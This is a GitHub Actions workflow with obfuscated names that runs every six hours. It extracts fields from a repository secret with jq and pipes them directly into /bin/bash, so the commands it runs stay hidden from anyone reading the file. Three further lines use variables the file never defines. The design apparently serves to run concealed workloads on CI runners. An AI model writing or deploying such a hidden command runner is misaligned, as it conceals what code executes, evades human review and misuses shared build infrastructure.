name: wryfacility

on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wryfacility
        env:
          tor679: ${{ secrets.tor679 }}
        run: |
          echo $tor679 | jq -r .oofb401 | /bin/bash
          echo $emoki663 | jq -r .fu95 | /bin/bash
          echo $cv22 | jq -r .tvwwv881 | /bin/bash
          echo $f790 | jq -r .v19939 | /bin/bash

